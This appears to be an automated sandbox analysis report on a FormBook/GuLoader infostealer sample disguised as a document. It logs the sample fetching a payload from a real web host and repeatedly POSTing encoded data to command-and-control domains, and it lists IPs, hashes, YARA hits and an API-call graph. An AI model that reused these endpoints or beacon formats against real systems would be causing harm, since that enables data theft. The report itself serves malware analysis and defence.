                                                                            Data Ascii: 2O=9i9IKJ/Yinkpc8n/vIpjyDktdEOFlHOqKMWE29FvCRW8GPAiXgltLJeVoEDCPwmbmcjcMKE2khZEghID1w9foA8v8c7zYtl7LiFirHKWnCVQF4WFQkT9R91eZEsMylUqQvgntHYOJcvNTnCSiQ9VKNTfb78Tqodq577inDE8Cr7e5U4F0QjsLPwFl060vzSJ6c+fOJd6uYcu82e3su/pTOo=
                                                                            Dec 3, 2024 19:00:01.416487932 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 18:00:01 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                            76 | 192.168.11.20 | 49829 | 149.88.81.190 | 80
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 19:00:03.948767900 CET | 2578 | OUT | POST /hkgx/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.xcvbj.asia
                                                                            Origin: http://www.xcvbj.asia
                                                                            Referer: http://www.xcvbj.asia/hkgx/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 19:00:03.948832035 CET | 5156 | OUT |
                                                                            Data Ascii: cN9p3/UW5pgXSNLXLmU8IS7Js1jlWSqeFY04q3OCPASKJxwkOpQyPIp78n3ntIZ6WnPaoE5c75oSTZPVp4Lmv5YKjZLYyqWfLX2im+KollQtHIG7CQxtLz7zoSSbaliRszAtiXsCc9Ihzs3ba13LT7ZvAkQ7Mx/+FqIT4Ych0O/wGq53A5jSoshhYdRqv0WIcZvSxn/o4l4GsPnMAYoLZng7Qdy9E8jGXYvq/sdA8OulpDONOhY
                                                                            Dec 3, 2024 19:00:03.948873997 CET | 184 | OUT |
                                                                            Data Ascii: TQesSzXBmwf3RyYQuFmpZD7eAeNEKf59csHlhhBvs5/R7NczDqMWpj8AKqbr+mN1eOxu2nLuwNt6UkNKrnamKcB5YaCuFhj695Xl6NCMOXb2nkhNjjTC68EkpVv3BPBaYhdF2WDjuXEKxnvz133LtPVbZ8DpNxtVfmaozuBs51b9bI4g4lX16Q==
                                                                            Dec 3, 2024 19:00:04.296648026 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 18:00:04 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                            77          192.168.11.20  49830        149.88.81.190   80
                                                                            Timestamp                           Bytes transferred  Direction  Data
                                                                            Dec 3, 2024 19:00:06.831593990 CET  484                OUT        GET /hkgx/?2O=wgVoJ8uM9T0/Zez11uxn+VRLTSqblAamGOKD8PxxFFLfP5o8U05sZY2pknTlSn+/tcq1eo8k+yVAgRwnrxxUqTNM4+b8NMxfCgVpsHr1kyIADa2UTEjwUtE=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.xcvbj.asia
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 19:00:07.185399055 CET  691                IN         HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 18:00:07 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                            78          192.168.11.20  49831        101.35.209.183  80
                                                                            Timestamp                           Bytes transferred  Direction  Data
                                                                            Dec 3, 2024 19:00:12.543556929 CET  758                OUT        POST /31pt/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.yc791022.asia
                                                                            Origin: http://www.yc791022.asia
                                                                            Referer: http://www.yc791022.asia/31pt/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=eOrJCvmaBO6G2C5ZnOTYk+9wdBYHWPlQmL787NU0ato17bc8yPNCteTpLzRIBV6A7rvxAQY7rXaUGMySU969Uk86khYxUvccld6sDELN71iPd6vI9Ho+unLwXtfOJ63NgX64fGBuXnjTun8Prff573xZHBYSHsefq5i5BRjZSgOTuk5x530mc8/7nQjJkNOfbw==
                                                                            Dec 3, 2024 19:00:12.886154890 CET  427                IN         HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 18:00:12 GMT
                                                                            Server: Apache
                                                                            Content-Length: 263
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                            79          192.168.11.20  49832        101.35.209.183  80
                                                                            Timestamp                           Bytes transferred  Direction  Data
                                                                            Dec 3, 2024 19:00:15.408231974 CET  778                OUT        POST /31pt/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.yc791022.asia
                                                                            Origin: http://www.yc791022.asia
                                                                            Referer: http://www.yc791022.asia/31pt/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=eOrJCvmaBO6GsgtZlvTYwu9/DRYHfvlcmL387MAkafc1+Og8zNlCg+TpTDRNM1697rzDAUY7rXOUGJeSUKu6U080rBYkQvccld6sDFvn70KPdI7I8j891HLxUtfON63JgX6afDZIXivTujsPruf+x3xfYRZNAJHJkdOGNh2HVxW4iS0rkFACfvjJjgahmPPEG4auEroCy/5/3MjqaAKtSKc=
                                                                            Dec 3, 2024 19:00:15.740709066 CET  427                IN         HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 18:00:15 GMT
                                                                            Server: Apache
                                                                            Content-Length: 263
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                            80          192.168.11.20  49833        101.35.209.183  80
                                                                            Timestamp                           Bytes transferred  Direction  Data
                                                                            Dec 3, 2024 19:00:18.272083998 CET  1289               OUT        POST /31pt/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.yc791022.asia
                                                                            Origin: http://www.yc791022.asia
                                                                            Referer: http://www.yc791022.asia/31pt/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 19:00:18.272135973 CET  2578               OUT
                                                                            Data Ascii: sxYNokF6GpYC9MqiZFud9qqV74WUTSOrcOmcNOQQOE1xYcVlcHJLtOI6a69S5pDVMA98/sPl32OK4PpthTVjsQ4AID0k8/+Z+Exm6aUxJRES+RN5fmaPxvW5Pq3pmrUxE9++I/4gMvJcD9Vgd+DEVGq7InWEQuXZdSxPFcSUlUQzSIa4wJZxkKadRuDLjfGvabPn9dHqHN2b9rqh1DHByiypOZed8yjq4qOMrO9nJw0UJEZJdkz
                                                                            Dec 3, 2024 19:00:18.272186995 CET  4060               OUT
                                                                            Data Ascii: pB+C/XEljLfFhrJ/Hp0K6mNj4AquONu0llMcL/M7SA7drP6+lFJnpRkw9kLBYoNZXAk5+RIEE4awqEPHR6H3BxEmuFrT25EBvA7XPAVA0NfLwJbxJ78FRSSrMO6L0rss6agzwoKTHhKWN6A3MRRcxv82y4fEFhGfV4hC4d7cYSFUqh8Hw0MQIrfHYgVQ1BGtISdPoN8XyMSpf55k7THOsknkd5ir7pvGsGOnOyECLRTXXBIB3cg
                                                                            Dec 3, 2024 19:00:18.603387117 CET  427                IN         HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 18:00:18 GMT
                                                                            Server: Apache
                                                                            Content-Length: 263
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                            81          192.168.11.20  49834        101.35.209.183  80
                                                                            Timestamp                           Bytes transferred  Direction  Data
                                                                            Dec 3, 2024 19:00:21.134114027 CET  487                OUT        GET /31pt/?2O=TMDpBYanOquY9Rx47rOd3KwxNkoHefYhv73C9/MKdrwqjZcj4ORMyeHFBityLVio1oCUCVJYl2rwHayMePC/S1ZjuitrANQdk8OOJhWAxEqHZ6TqwRsh8gk=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.yc791022.asia
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 19:00:21.476221085 CET  427                IN         HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 18:00:21 GMT
                                                                            Server: Apache
                                                                            Content-Length: 263
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                            82          192.168.11.20  49835        38.47.232.202   80
                                                                            Timestamp                           Bytes transferred  Direction  Data
                                                                            Dec 3, 2024 19:00:26.854875088 CET  746                OUT        POST /p3j6/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.43kdd.top
                                                                            Origin: http://www.43kdd.top
                                                                            Referer: http://www.43kdd.top/p3j6/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=DX5WBz7Pi8kdj22dTEbYIsZHnuykdKr4UlBaU9yLhTjq5cozq3vE/2VLSWeO3ON7b6zxIInuXxfA6eAX/mHIAWzARjO76t43uIYnCMRR6CPQ0knJrIGMqKaoZSc9byRWeqIq+jvWxNykggQndmxW82DISLY2t6TA7KqDDvJNW08B0jd8LOZm0kAzG8w7MOko1g==
                                                                            Dec 3, 2024 19:00:27.215039968 CET  312                IN         HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 18:00:27 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66df9b06-94"
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                            83          192.168.11.20  49836        38.47.232.202   80
                                                                            Timestamp                           Bytes transferred  Direction  Data
                                                                            Dec 3, 2024 19:00:29.745966911 CET  766                OUT        POST /p3j6/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.43kdd.top
                                                                            Origin: http://www.43kdd.top
                                                                            Referer: http://www.43kdd.top/p3j6/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=DX5WBz7Pi8kdjVudRjvYc8ZEiuykH6rkUlNaU4Klhh3q58YzlWvE62VLdGeL6uNKb6uOIL/uXxLA6fwX8VvLBGzeaDOlnd43uIYnCM066CXQ1QjJ55GPnqarQyc9MiRSeqJN+iyexOakgiIndTNVz2DKWLYpj4Wzj+aoVP9wYX4N4VQmW8tC33cBCMJTOMlzol6fN6Plu2SFII8uGVjo9Xc=
                                                                            Dec 3, 2024 19:00:30.111435890 CET  312                IN         HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 18:00:29 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66df9b06-94"
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                            84 | 192.168.11.20 | 49837 | 38.47.232.202 | 80
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 19:00:32.616333961 CET | 2578 | OUT | POST /p3j6/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.43kdd.top
                                                                            Origin: http://www.43kdd.top
                                                                            Referer: http://www.43kdd.top/p3j6/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 19:00:32.616430044 CET | 5337 | OUT
                                                                            Dec 3, 2024 19:00:32.958389997 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 18:00:32 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66df9b06-94"
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                            85 | 192.168.11.20 | 49838 | 38.47.232.202 | 80
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 19:00:35.487014055 CET | 483 | OUT | GET /p3j6/?2O=OVR2CF7p+NAClGW2S0P2PNgTjoCVCaKiV2x0cNqPuUjpn/Qhs1nMs1l1ZXuPw6NSEK+YKob7dwv93+8G93LPPXy+SQSX5+Y6iKJbGa1Xxz7I+GHh/5eIgvw=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.43kdd.top
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 19:00:35.826168060 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 18:00:35 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66df9b06-94"
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            0 | 192.168.11.20 | 49748 | 122.201.127.17 | 443 | 3396 | C:\Users\user\Desktop\Document_084462.scr.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-12-03 17:54:20 UTC | 190 | OUT | GET /hEuJhxvbfOcCGqtagtOtF215.bin HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                            Host: babalharra.com.au
                                                                            Cache-Control: no-cache
                                                                            2024-12-03 17:54:21 UTC | 249 | IN | HTTP/1.1 200 OK
                                                                            Date: Tue, 03 Dec 2024 17:54:20 GMT
                                                                            Server: Apache
                                                                            Upgrade: h2,h2c
                                                                            Connection: Upgrade, close
                                                                            Last-Modified: Tue, 03 Dec 2024 12:27:11 GMT
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 290368
                                                                            Content-Type: application/octet-stream



                                                                            Target ID:0
                                                                            Start time:12:53:26
                                                                            Start date:03/12/2024
                                                                            Path:C:\Users\user\Desktop\Document_084462.scr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Document_084462.scr.exe"
                                                                            Imagebase:0x400000
                                                                            File size:456'022 bytes
                                                                            MD5 hash:B4E362177A0E0836DD04831FE456255B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.12951622773.0000000009B40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:1
                                                                            Start time:12:54:08
                                                                            Start date:03/12/2024
                                                                            Path:C:\Users\user\Desktop\Document_084462.scr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Document_084462.scr.exe"
                                                                            Imagebase:0x400000
                                                                            File size:456'022 bytes
                                                                            MD5 hash:B4E362177A0E0836DD04831FE456255B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.13274732696.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.13274829512.00000000067E0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:12:54:34
                                                                            Start date:03/12/2024
                                                                            Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                            Imagebase:0x140000000
                                                                            File size:16'696'840 bytes
                                                                            MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            Target ID:3
                                                                            Start time:12:54:35
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\SysWOW64\waitfor.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\waitfor.exe"
                                                                            Imagebase:0x930000
                                                                            File size:32'768 bytes
                                                                            MD5 hash:E58E152B44F20DD099C5105DE482DF24
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.16927455279.00000000048A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.16927359269.0000000004850000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            Target ID:4
                                                                            Start time:12:54:59
                                                                            Start date:03/12/2024
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x7ff78a190000
                                                                            File size:597'432 bytes
                                                                            MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true


                                                                              Execution Graph

                                                                              Execution Coverage:17.8%
                                                                              Dynamic/Decrypted Code Coverage:13.6%
                                                                              Signature Coverage:16.6%
                                                                              Total number of Nodes:1580
                                                                              Total number of Limit Nodes:30
4067e3 GetModuleHandleA 4233->4248 4237 405972 4236->4237 4238 405976 GetLastError 4236->4238 4237->4229 4238->4237 4239 405985 SetFileSecurityW 4238->4239 4239->4237 4240 40599b GetLastError 4239->4240 4240->4237 4242 405456 24 API calls 4241->4242 4243 401431 4242->4243 4244 4063ee lstrcpynW 4243->4244 4244->4228 4246 4059b2 4245->4246 4247 4059b6 GetLastError 4245->4247 4246->4229 4247->4246 4249 406809 GetProcAddress 4248->4249 4250 4067ff 4248->4250 4252 4059c6 4249->4252 4254 406773 GetSystemDirectoryW 4250->4254 4252->4229 4253 406805 4253->4249 4253->4252 4255 406795 wsprintfW LoadLibraryExW 4254->4255 4255->4253 5002 402a42 5003 402d1c 17 API calls 5002->5003 5004 402a48 5003->5004 5005 402a88 5004->5005 5006 402a6f 5004->5006 5015 402925 5004->5015 5007 402aa2 5005->5007 5008 402a92 5005->5008 5011 402a74 5006->5011 5012 402a85 5006->5012 5010 40642b 17 API calls 5007->5010 5009 402d1c 17 API calls 5008->5009 5009->5015 5010->5015 5016 4063ee lstrcpynW 5011->5016 5017 406335 wsprintfW 5012->5017 5016->5015 5017->5015 5018 401c43 5019 402d1c 17 API calls 5018->5019 5020 401c4a 5019->5020 5021 402d1c 17 API calls 5020->5021 5022 401c57 5021->5022 5023 401c6c 5022->5023 5024 402d3e 17 API calls 5022->5024 5025 401c7c 5023->5025 5026 402d3e 17 API calls 5023->5026 5024->5023 5027 401cd3 5025->5027 5028 401c87 5025->5028 5026->5025 5029 402d3e 17 API calls 5027->5029 5030 402d1c 17 API calls 5028->5030 5031 401cd8 5029->5031 5032 401c8c 5030->5032 5034 402d3e 17 API calls 5031->5034 5033 402d1c 17 API calls 5032->5033 5035 401c98 5033->5035 5036 401ce1 FindWindowExW 5034->5036 5037 401cc3 SendMessageW 5035->5037 5038 401ca5 SendMessageTimeoutW 5035->5038 5039 401d03 5036->5039 5037->5039 5038->5039 5040 402b43 5041 4067e3 5 API calls 5040->5041 5042 402b4a 5041->5042 5043 402d3e 17 API calls 5042->5043 5044 402b53 5043->5044 5045 402b57 IIDFromString 5044->5045 5047 402b8e 5044->5047 5046 402b66 5045->5046 5045->5047 5046->5047 5050 4063ee lstrcpynW 5046->5050 
5049 402b83 CoTaskMemFree 5049->5047 5050->5049 5051 402947 5052 402d3e 17 API calls 5051->5052 5053 402955 5052->5053 5054 40296b 5053->5054 5055 402d3e 17 API calls 5053->5055 5056 405ebf 2 API calls 5054->5056 5055->5054 5057 402971 5056->5057 5079 405ee4 GetFileAttributesW CreateFileW 5057->5079 5059 40297e 5060 402a21 5059->5060 5061 40298a GlobalAlloc 5059->5061 5064 402a29 DeleteFileW 5060->5064 5065 402a3c 5060->5065 5062 4029a3 5061->5062 5063 402a18 CloseHandle 5061->5063 5080 40345a SetFilePointer 5062->5080 5063->5060 5064->5065 5067 4029a9 5068 403444 ReadFile 5067->5068 5069 4029b2 GlobalAlloc 5068->5069 5070 4029c2 5069->5070 5071 4029f6 5069->5071 5072 40324c 31 API calls 5070->5072 5073 405f96 WriteFile 5071->5073 5078 4029cf 5072->5078 5074 402a02 GlobalFree 5073->5074 5075 40324c 31 API calls 5074->5075 5076 402a15 5075->5076 5076->5063 5077 4029ed GlobalFree 5077->5071 5078->5077 5079->5059 5080->5067 5081 4053ca 5082 4053da 5081->5082 5083 4053ee 5081->5083 5085 4053e0 5082->5085 5086 405437 5082->5086 5084 4053f6 IsWindowVisible 5083->5084 5088 40540d 5083->5088 5084->5086 5087 405403 5084->5087 5090 404390 SendMessageW 5085->5090 5089 40543c CallWindowProcW 5086->5089 5094 404cff SendMessageW 5087->5094 5088->5089 5099 404d7f 5088->5099 5092 4053ea 5089->5092 5090->5092 5095 404d22 GetMessagePos ScreenToClient SendMessageW 5094->5095 5096 404d5e SendMessageW 5094->5096 5097 404d56 5095->5097 5098 404d5b 5095->5098 5096->5097 5097->5088 5098->5096 5108 4063ee lstrcpynW 5099->5108 5101 404d92 5109 406335 wsprintfW 5101->5109 5103 404d9c 5104 40140b 2 API calls 5103->5104 5105 404da5 5104->5105 5110 4063ee lstrcpynW 5105->5110 5107 404dac 5107->5086 5108->5101 5109->5103 5110->5107 5111 700b1000 5114 700b101b 5111->5114 5121 700b1516 5114->5121 5116 700b1020 5117 700b1027 GlobalAlloc 5116->5117 5118 700b1024 5116->5118 5117->5118 5119 700b153d 3 API calls 5118->5119 5120 700b1019 5119->5120 5123 700b151c 5121->5123 5122 700b1522 5122->5116 
